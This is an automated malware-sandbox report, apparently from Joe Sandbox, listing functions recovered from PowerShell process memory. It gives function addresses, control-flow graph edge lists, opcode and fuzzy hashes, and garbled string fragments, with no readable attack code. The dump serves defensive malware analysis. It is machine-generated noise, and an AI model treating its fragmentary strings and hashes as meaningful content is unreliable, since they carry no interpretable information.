                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6g$ 7^$(7^$8[q$8[q$@7^$H7^$HBq$P7^$^$p[i$x6^$x6^
                                                                                • API String ID: 0-686857945
                                                                                • Opcode ID: 2374af0f060e7ad39ac5dc86b661fcccff202717a7c8a12c9b9691ca5aec5fa2
                                                                                • Instruction ID: 209ca6a4ef77bb567bef1ee9cba8abd0061899d3d2e0bf06da8593f2184c8ba9
                                                                                • Opcode Fuzzy Hash: 2374af0f060e7ad39ac5dc86b661fcccff202717a7c8a12c9b9691ca5aec5fa2
                                                                                • Instruction Fuzzy Hash: D9A29530A1AA498FE794EB28C855BE977F1FF55350F1445B9D00DC72A2CE78AC86CB81
                                                                                Function 00007FFAAB77AF80 Relevance: 1.8, APIs: 1, Instructions: 331comCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1993017959.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstance
                                                                                • String ID:
                                                                                • API String ID: 542301482-0
                                                                                • Opcode ID: 02176ed48190f4fc0be97ad61a9b6a64c29591702a7099c513326384fb2698a2
                                                                                • Instruction ID: 0291f099dff755c98f34fe1736f5fe38cce54bc2f748cb8d204a445ecf18d321
                                                                                • Opcode Fuzzy Hash: 02176ed48190f4fc0be97ad61a9b6a64c29591702a7099c513326384fb2698a2
                                                                                • Instruction Fuzzy Hash: D3911771A0CA4C8FEB589B6CD8457F97BE1EB96321F10817FD04DC32A2DE65A84687C1
                                                                                Function 00007FFAAB7857E6 Relevance: .5, Instructions: 472COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 619 7ffaab7857e6-7ffaab7857f3 620 7ffaab7857fe-7ffaab7858c7 619->620 621 7ffaab7857f5-7ffaab7857fd 619->621 625 7ffaab7858c9-7ffaab7858d2 620->625 626 7ffaab785933 620->626 621->620 625->626 628 7ffaab7858d4-7ffaab7858e0 625->628 627 7ffaab785935-7ffaab78595a 626->627 635 7ffaab78595c-7ffaab785965 627->635 636 7ffaab7859c6 627->636 629 7ffaab785919-7ffaab785931 628->629 630 7ffaab7858e2-7ffaab7858f4 628->630 629->627 632 7ffaab7858f8-7ffaab78590b 630->632 633 7ffaab7858f6 630->633 632->632 634 7ffaab78590d-7ffaab785915 632->634 633->632 634->629 635->636 637 7ffaab785967-7ffaab785973 635->637 638 7ffaab7859c8-7ffaab785a70 636->638 639 7ffaab7859ac-7ffaab7859c4 637->639 640 7ffaab785975-7ffaab785987 637->640 649 7ffaab785ade 638->649 650 7ffaab785a72-7ffaab785a7c 638->650 639->638 642 7ffaab78598b-7ffaab78599e 640->642 643 7ffaab785989 640->643 642->642 645 7ffaab7859a0-7ffaab7859a8 642->645 643->642 645->639 652 7ffaab785ae0-7ffaab785b09 649->652 650->649 651 7ffaab785a7e-7ffaab785a8b 650->651 653 7ffaab785a8d-7ffaab785a9f 651->653 654 7ffaab785ac4-7ffaab785adc 651->654 658 7ffaab785b0b-7ffaab785b16 652->658 659 7ffaab785b73 652->659 656 7ffaab785aa1 653->656 657 7ffaab785aa3-7ffaab785ab6 653->657 654->652 656->657 657->657 660 7ffaab785ab8-7ffaab785ac0 657->660 658->659 661 7ffaab785b18-7ffaab785b26 658->661 662 7ffaab785b75-7ffaab785c1b 659->662 660->654 663 7ffaab785b5f-7ffaab785b71 661->663 664 7ffaab785b28-7ffaab785b3a 661->664 671 7ffaab785c1d 662->671 672 7ffaab785c23-7ffaab785c5d call 7ffaab785ca4 662->672 663->662 665 7ffaab785b3e-7ffaab785b51 664->665 666 7ffaab785b3c 664->666 665->665 668 7ffaab785b53-7ffaab785b5b 665->668 666->665 668->663 671->672 678 7ffaab785c62-7ffaab785c88 672->678 679 7ffaab785c8f-7ffaab785ca3 678->679 680 7ffaab785c8a 678->680 680->679
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1993017959.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 27b6d0f3ec4ac115575ab368707cafb3488b0fbade99e187ccc003ca641ae400
                                                                                • Instruction ID: f5fbdca63fd37a80e453774701c418cac0119f100cdd7c9e8479f1d0713ec9ab
                                                                                • Opcode Fuzzy Hash: 27b6d0f3ec4ac115575ab368707cafb3488b0fbade99e187ccc003ca641ae400
                                                                                • Instruction Fuzzy Hash: F1F1B430509A8D8FEBA8DF68C8557F937E1FF55350F04826EE84DC72A1DB7498858B82
                                                                                Function 00007FFAAB786592 Relevance: .5, Instructions: 458COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 681 7ffaab786592-7ffaab78659f 682 7ffaab7865a1-7ffaab7865a9 681->682 683 7ffaab7865aa-7ffaab786677 681->683 682->683 687 7ffaab786679-7ffaab786682 683->687 688 7ffaab7866e3 683->688 687->688 689 7ffaab786684-7ffaab786690 687->689 690 7ffaab7866e5-7ffaab78670a 688->690 691 7ffaab7866c9-7ffaab7866e1 689->691 692 7ffaab786692-7ffaab7866a4 689->692 696 7ffaab78670c-7ffaab786715 690->696 697 7ffaab786776 690->697 691->690 694 7ffaab7866a8-7ffaab7866bb 692->694 695 7ffaab7866a6 692->695 694->694 698 7ffaab7866bd-7ffaab7866c5 694->698 695->694 696->697 699 7ffaab786717-7ffaab786723 696->699 700 7ffaab786778-7ffaab78679d 697->700 698->691 701 7ffaab78675c-7ffaab786774 699->701 702 7ffaab786725-7ffaab786737 699->702 707 7ffaab78679f-7ffaab7867a9 700->707 708 7ffaab78680b 700->708 701->700 703 7ffaab78673b-7ffaab78674e 702->703 704 7ffaab786739 702->704 703->703 706 7ffaab786750-7ffaab786758 703->706 704->703 706->701 707->708 710 7ffaab7867ab-7ffaab7867b8 707->710 709 7ffaab78680d-7ffaab78683b 708->709 717 7ffaab78683d-7ffaab786848 709->717 718 7ffaab7868ab 709->718 711 7ffaab7867f1-7ffaab786809 710->711 712 7ffaab7867ba-7ffaab7867cc 710->712 711->709 713 7ffaab7867d0-7ffaab7867e3 712->713 714 7ffaab7867ce 712->714 713->713 716 7ffaab7867e5-7ffaab7867ed 713->716 714->713 716->711 717->718 720 7ffaab78684a-7ffaab786858 717->720 719 7ffaab7868ad-7ffaab78699a 718->719 731 7ffaab78699c 719->731 732 7ffaab7869a2-7ffaab7869bc 719->732 721 7ffaab786891-7ffaab7868a9 720->721 722 7ffaab78685a-7ffaab78686c 720->722 721->719 724 7ffaab786870-7ffaab786883 722->724 725 7ffaab78686e 722->725 724->724 727 7ffaab786885-7ffaab78688d 724->727 725->724 727->721 731->732 735 7ffaab7869c5-7ffaab786a04 call 7ffaab786a20 732->735 739 7ffaab786a0b-7ffaab786a1f 735->739 740 7ffaab786a06 735->740 740->739
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1993017959.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1b1354a2dcc9d1e2f4824881e4b6993d6f4c6a9d600724ace7af3405e03429d6
                                                                                • Instruction ID: bb4867709a35bcc17482b7ef19d5c67644c5ae6af32a7c2c1831721d0630ddd0
                                                                                • Opcode Fuzzy Hash: 1b1354a2dcc9d1e2f4824881e4b6993d6f4c6a9d600724ace7af3405e03429d6
                                                                                • Instruction Fuzzy Hash: 1EE1C330509A8E8FEBA8DF68C855BF937E1EB55350F14826ED84DC72A5CE74D8848BC1
                                                                                Function 00007FFAAB77E6A0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1993017959.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: =O_H
                                                                                • API String ID: 0-501726628
                                                                                • Opcode ID: fea44ad90737e1d2f3ba43cdbc7e01a8a0126b22d044f0251db03c65d711bc6b
                                                                                • Instruction ID: 1cf3571c74e431d3ce4d0a36c375f0ab66d9e39c6eb795c052194a6579f4eacf
                                                                                • Opcode Fuzzy Hash: fea44ad90737e1d2f3ba43cdbc7e01a8a0126b22d044f0251db03c65d711bc6b
                                                                                • Instruction Fuzzy Hash: 79511B71A1DB498FEB69D76C98552B87BF1EB5A350F04407AD04EC32E2CE68584587C2
                                                                                Function 00007FFAAB77E5B9 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 499 7ffaab77e5b9-7ffaab77e5bd 500 7ffaab77e5bf 499->500 501 7ffaab77e5c5 499->501 500->501 502 7ffaab77e5c8-7ffaab77e5d9 501->502 503 7ffaab77e5c7 501->503 504 7ffaab77e5dc-7ffaab77e63b 502->504 505 7ffaab77e5db 502->505 503->502 508 7ffaab77e63e-7ffaab77e676 IUnknown_QueryInterface_Proxy 504->508 505->504 509 7ffaab77e67e-7ffaab77e69b 508->509 510 7ffaab77e678 508->510 510->509
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1993017959.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: Interface_ProxyQueryUnknown_
                                                                                • String ID:
                                                                                • API String ID: 2522245112-0
                                                                                • Opcode ID: d2d4e4788147d0b510affcb3aa07d16077a422b4b71a39b44a6d99499da18aa4
                                                                                • Instruction ID: aa0c3347b5f896adb44928c97b0191370e7568ae9680c2847e321393d1e87c7b
                                                                                • Opcode Fuzzy Hash: d2d4e4788147d0b510affcb3aa07d16077a422b4b71a39b44a6d99499da18aa4
                                                                                • Instruction Fuzzy Hash: 64314B3191DB888FD7299B6C9C0A5B67FF4DB57321F00417FE089C3162DA64644ACB82
                                                                                Function 00007FFAAB84333D Relevance: .4, Instructions: 378COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1994269366.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 06b0c0c6488e1f906d53241302eaed9b0d7dac6c84b020562b15b34253f5d6a3
                                                                                • Instruction ID: a47cb6315692034c28970d27e318b5973c1b95119d6589cc50df6b6e06008153
                                                                                • Opcode Fuzzy Hash: 06b0c0c6488e1f906d53241302eaed9b0d7dac6c84b020562b15b34253f5d6a3
                                                                                • Instruction Fuzzy Hash: DFB11472A1EB8A8FE796DB7CC8555F87BD1FF5A250B0841FAD04DC71A3D918A80983C1
                                                                                Function 00007FFAAB843462 Relevance: .1, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1994269366.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6bf9be377f0a2736bced1204124d9272f04e232d08a7ffb8fc6fee1d36c51364
                                                                                • Instruction ID: 9f0edf10e9ae87f1660f2ec6aea9fd411c210bdefda062ffc3184cd6dcbf67d6
                                                                                • Opcode Fuzzy Hash: 6bf9be377f0a2736bced1204124d9272f04e232d08a7ffb8fc6fee1d36c51364
                                                                                • Instruction Fuzzy Hash: 0131A352D2FAC64BF6A6977C98111F8AAC1BF2A690B5944FAD44DC71E3DD0CB80842C2

                                                                                Non-executed Functions

                                                                                Function 00007FFAAB7852E9 Relevance: .4, Instructions: 412COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1993017959.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffaab770000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f113a315ef669d6da88db93c88c59a0ddf46bd418b37af7776a1e192539eb2ae
                                                                                • Instruction ID: 6328ede3a51f98e91371c4a3cd8e4a46a1525a3b041ac1ab9fcbf2d459022e2b
                                                                                • Opcode Fuzzy Hash: f113a315ef669d6da88db93c88c59a0ddf46bd418b37af7776a1e192539eb2ae
                                                                                • Instruction Fuzzy Hash: 31D1D630519A8D8FEBA8DF28C8557F977E1FF55350F14826EE84DC32A1CB74A8458B82

                                                                                Executed Functions

                                                                                Function 07A0D020 Relevance: 13.0, Strings: 10, Instructions: 520COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q
                                                                                • API String ID: 0-507553569
                                                                                • Opcode ID: d948fd6c07f8d943e25ff536066ed991b86806b2b8aee9144d4cb93d99823f27
                                                                                • Instruction ID: 8552b2f5e4ae20d9af43525a65812d38f81e19759a9dad2f68ac439b3abb71e0
                                                                                • Opcode Fuzzy Hash: d948fd6c07f8d943e25ff536066ed991b86806b2b8aee9144d4cb93d99823f27
                                                                                • Instruction Fuzzy Hash: 9912C3B6B00215CFD724CBA4E455A6ABBF2AFC9314F148869D9199B391CB32EC41CBD1
                                                                                Function 07A04FB7 Relevance: 7.8, Strings: 6, Instructions: 310COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                                                • API String ID: 0-1794337482
                                                                                • Opcode ID: 8b8e72170083f0e8700749718d77f11f6a5c01a357af45e1b724570e9bdb23be
                                                                                • Instruction ID: 2ca7055fc7bba47c63a8ab0f232985b29edbaf980277a14794300edf89ee4d3e
                                                                                • Opcode Fuzzy Hash: 8b8e72170083f0e8700749718d77f11f6a5c01a357af45e1b724570e9bdb23be
                                                                                • Instruction Fuzzy Hash: 29D172B4E012299FD764DBA4D850F5ABBB2BB84300F108599D509AF381CB75ED86CFE1
                                                                                Function 07A06109 Relevance: 7.8, Strings: 6, Instructions: 289COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                                                • API String ID: 0-1794337482
                                                                                • Opcode ID: 3b381da48b1e75c1302d9f3316cfa9ca5658b3d56b74c7645083029942addabe
                                                                                • Instruction ID: bba472894b97d23ab0ba1761cb488056da58752890f97ac9ea4946c1373f2637
                                                                                • Opcode Fuzzy Hash: 3b381da48b1e75c1302d9f3316cfa9ca5658b3d56b74c7645083029942addabe
                                                                                • Instruction Fuzzy Hash: 36B1D2B0A002199FD718DBA4D451B5EBBB2AFC8304F14C828D915AF385CB76EC56CBD1
                                                                                Function 07A0F2A0 Relevance: 5.6, Strings: 4, Instructions: 648COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q$4'q
                                                                                • API String ID: 0-4210068417
                                                                                • Opcode ID: 45fe4b5e6e74ce57ee0171e23c32d9156f412e320629b729e2eeb84e17506da3
                                                                                • Instruction ID: 00abf4aba341f00830653ccb9ae3604e2bfaf42afd6d6a7443dc3fb76f0cf55a
                                                                                • Opcode Fuzzy Hash: 45fe4b5e6e74ce57ee0171e23c32d9156f412e320629b729e2eeb84e17506da3
                                                                                • Instruction Fuzzy Hash: C8226CB1B043158FD7359B78A81076A7BB2AFC6310F1488AAD915EF2D1DB32D845C7E2
                                                                                Function 07A0604A Relevance: 4.0, Strings: 3, Instructions: 256COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$4'q
                                                                                • API String ID: 0-3126650252
                                                                                • Opcode ID: 212fcf541649c9470d5a2768511833accdfd5fbefd0968e60f28fc89736513b2
                                                                                • Instruction ID: 8bd715167d16c8662b84ff2e433432f682dac00f6de071bab08efadd636ea2d8
                                                                                • Opcode Fuzzy Hash: 212fcf541649c9470d5a2768511833accdfd5fbefd0968e60f28fc89736513b2
                                                                                • Instruction Fuzzy Hash: 7FA1ACB4A002149FDB14DF94D450B9EBBB2AFC8308F15C829D9156F385CB76E856CBD2
                                                                                Function 07A0BAB1 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: 56f050c40f8a4922e8d75369df8ec7cb82b89ffb19c1ab1538d1a029bcf6f524
                                                                                • Instruction ID: c3d5a3a37b0e2b923c01e26059162ac7c1d8889650b0fe20166ad7ca721505cc
                                                                                • Opcode Fuzzy Hash: 56f050c40f8a4922e8d75369df8ec7cb82b89ffb19c1ab1538d1a029bcf6f524
                                                                                • Instruction Fuzzy Hash: BA026DB4A00228DFD724DB14C950BDEBBB2BB85304F1085E9DA09AB785CB75DE81CF91
                                                                                Function 07A05443 Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: 2c31b567ffacd4207b610c0a2053e11e62d7edac42f943283a48485c74d29b7e
                                                                                • Instruction ID: ed638701f2de292adc0edf6c1271f15434b40ff55054f9ed8497f0e10efab01b
                                                                                • Opcode Fuzzy Hash: 2c31b567ffacd4207b610c0a2053e11e62d7edac42f943283a48485c74d29b7e
                                                                                • Instruction Fuzzy Hash: C2F193B4A012289FE724DB64C850F5ABBB3AFC4300F14C899D509AF795CB75ED468FA1
                                                                                Function 07A0ADA0 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q
                                                                                • API String ID: 0-1467158625
                                                                                • Opcode ID: 5256f77cafe665ccaab8aafbb5e3e3b375bfad9ba4570864152f19faa1d4dd6c
                                                                                • Instruction ID: 24148328f28e48c070ec90493a2fe5868d843afbdd8a7ef1928d6945974b28be
                                                                                • Opcode Fuzzy Hash: 5256f77cafe665ccaab8aafbb5e3e3b375bfad9ba4570864152f19faa1d4dd6c
                                                                                • Instruction Fuzzy Hash: 4EE1B2B4B002289FD724DB64CD54B9EBBB2AB84304F108499EA099F785CF75ED858FD1
                                                                                Function 07A01FD0 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tPq
                                                                                • API String ID: 0-789928099
                                                                                • Opcode ID: 2eb6efa3551a7a54897ca697a04b7478624b609e578f3e67c0e11ea76918b7ba
                                                                                • Instruction ID: bf0bbbb12d35d00619169ce2ac81050a3712c135f275a7bd967419140e4bee27
                                                                                • Opcode Fuzzy Hash: 2eb6efa3551a7a54897ca697a04b7478624b609e578f3e67c0e11ea76918b7ba
                                                                                • Instruction Fuzzy Hash: 9D81BE706093858FD7128B649828B65BFB1BF87204F1DC8DBD5A58F2E3C6768C46C792
                                                                                Function 07A0D000 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q
                                                                                • API String ID: 0-1807707664
                                                                                • Opcode ID: 31d50289d66c3947393d498917a6e94d66f2eb188994d3dcba8c4b1dd8c3cd7e
                                                                                • Instruction ID: b45a0a30102e53b4140616d4e45534aa8198ed584efaaf38698eb695555159b6
                                                                                • Opcode Fuzzy Hash: 31d50289d66c3947393d498917a6e94d66f2eb188994d3dcba8c4b1dd8c3cd7e
                                                                                • Instruction Fuzzy Hash: 1B4126F2B043129FDB264BB078107697F72AFC2350F1548AAC565DB2C2DB2AD945C3E2
                                                                                Function 07A03D30 Relevance: .6, Instructions: 568COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aa1bf4a1b8a604bf8f1f5afc6e8b21a187a9f4428eb85feeb62703c7132b7165
                                                                                • Instruction ID: c2912d460a4ffeed521bbc6f23b0120e8be07282a15a9038a9e654052612907f
                                                                                • Opcode Fuzzy Hash: aa1bf4a1b8a604bf8f1f5afc6e8b21a187a9f4428eb85feeb62703c7132b7165
                                                                                • Instruction Fuzzy Hash: 90327EB4B01204DFDB14CB98D490B5ABBB2BF89314F14C469EA15AF395CB72EC46CB91
                                                                                Function 07A04209 Relevance: .5, Instructions: 476COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 373c762c1b0c53dd30d48f672ad6814507831b6b30c19a01b93e6b514c9e574e
                                                                                • Instruction ID: e6d658a60e0bd7dc41cb8fe11fd771289f18ab0a15df96a1d99df48e136284bf
                                                                                • Opcode Fuzzy Hash: 373c762c1b0c53dd30d48f672ad6814507831b6b30c19a01b93e6b514c9e574e
                                                                                • Instruction Fuzzy Hash: 7B126AB4B00245DFDB14CF98D480B6ABBB2BF89314F14C459EA15AB396CB72EC45CB91
                                                                                Function 07A03988 Relevance: .2, Instructions: 247COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e0ccb76b07c858f08f3a394e6723d1a5d6bbea720dfedea3fcf7f4106e5e4c06
                                                                                • Instruction ID: 248010ce193dd6f6a128f29ee1af4bd51f0dc803c111a402d29fb3b0e6cb18d7
                                                                                • Opcode Fuzzy Hash: e0ccb76b07c858f08f3a394e6723d1a5d6bbea720dfedea3fcf7f4106e5e4c06
                                                                                • Instruction Fuzzy Hash: CD9180B0B10214DFDB14DB94D450B9EBBA3AFC8304F548869E919AF781CB76EC45CBA1
                                                                                Function 07A03962 Relevance: .2, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 50a6918f6c68380510141a73a72ad81d4b57c33dbf89cfdf3f7be109b4379f55
                                                                                • Instruction ID: 090d1465f4920925c758e91bd818c73d9d90342447f23356a64ce14f80cfce39
                                                                                • Opcode Fuzzy Hash: 50a6918f6c68380510141a73a72ad81d4b57c33dbf89cfdf3f7be109b4379f55
                                                                                • Instruction Fuzzy Hash: B691B1B0A00214EFDB14DF94D450B9ABBB2BF89304F158469E919AF7D1CB72EC45CBA1
                                                                                Function 07A0D36C Relevance: .2, Instructions: 209COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 57cda4afb1f25e000af3e74f9d2b310381d464dcd395539598549d240d6e19a4
                                                                                • Instruction ID: e133e6897e1018ba1ff4d90425526106fd0272c1fd8dbd3f4f7fbaf6082425eb
                                                                                • Opcode Fuzzy Hash: 57cda4afb1f25e000af3e74f9d2b310381d464dcd395539598549d240d6e19a4
                                                                                • Instruction Fuzzy Hash: 178189B6B00205DFDB14CF94D495A9ABBB2BF89314F19C499D818AB391CB32EC41CF91
                                                                                Function 07A0F284 Relevance: .1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.1737830901.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7a00000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
